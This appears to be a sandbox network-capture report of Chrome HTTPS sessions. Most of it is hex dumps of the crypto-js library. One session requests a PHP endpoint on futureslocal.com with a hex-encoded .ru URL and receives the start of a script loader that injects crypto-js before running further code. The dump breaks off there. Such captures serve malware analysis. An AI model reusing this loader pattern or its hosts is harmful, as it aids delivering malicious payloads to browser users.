                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WS3TgSWqRwR6s1Xp3YIBLm9z3LKScl9o20QJGRdLy3hRGV30sjWgJULA07PUvvW%2BS1nEi5No5zq73%2F%2BfXZdNDpxDSWAYozES7DPO%2FnuUmRQfKb02ZbACA6lGjc7s9X5d4DuTWBwa"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6200d6f8cc427-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:48:59 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                  Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66
                                                                                  Data Ascii: =window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74
                                                                                  Data Ascii: 0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:funct
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65
                                                                                  Data Ascii: t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProce
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f
                                                                                  Data Ascii: ==i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29
                                                                                  Data Ascii: e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37
                                                                                  Data Ascii: o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c
                                                                                  Data Ascii: (S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c
                                                                                  Data Ascii: ne.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<
                                                                                  2025-01-07 18:48:59 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29
                                                                                  Data Ascii: unction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.649719103.83.194.554436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:48:59 UTC432OUTGET /res444.php?2-68747470733a2f2f375838782e6469676974616c766f796167652e72752f786178622f-scorpion HTTP/1.1
                                                                                  Host: futureslocal.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:00 UTC196INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:00 GMT
                                                                                  Server: Apache
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/javascript;charset=UTF-8
                                                                                  2025-01-07 18:49:00 UTC1994INData Raw: 37 62 65 0d 0a 20 20 20 20 76 61 72 20 4a 4a 6e 58 48 42 6f 69 69 51 64 55 47 43 4c 48 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 4a 4a 6e 58 48 42 6f 69 69 51 64 55 47 43 4c 48 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 4a 4a 6e 58 48 42 6f 69 69 51 64 55 47 43 4c 48 29 3b 0d 0a 4a 4a 6e 58 48 42 6f 69 69 51 64 55 47 43 4c 48 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                  Data Ascii: 7be var JJnXHBoiiQdUGCLH = document.createElement("script");JJnXHBoiiQdUGCLH.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(JJnXHBoiiQdUGCLH);JJnXHBoiiQdUGCLH.onload=function()


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.649720104.17.25.144436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:00 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                  Host: cdnjs.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:00 UTC959INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:00 GMT
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: public, max-age=30672000
                                                                                  ETag: W/"5eb03e2d-bb78"
                                                                                  Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Timing-Allow-Origin: *
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 79414
                                                                                  Expires: Sun, 28 Dec 2025 18:49:00 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZOx%2F7DSeJOwF3%2BmT7TBFgbOe1fIcyUhDzhPxz2WrNc6bnIMlYdFWwQT9z6ZqUNtUt4mV9ZXbz0DjjyT0GLc3t8%2F7cPavWxiQoySAhweA3%2FjKUKGtzOaNziBLoxhnrk9mjPfZN8pU"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe62012482a5e7a-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:00 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                  Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66
                                                                                  Data Ascii: =window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74
                                                                                  Data Ascii: 0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:funct
                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65
                                                                                  Data Ascii: t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProce
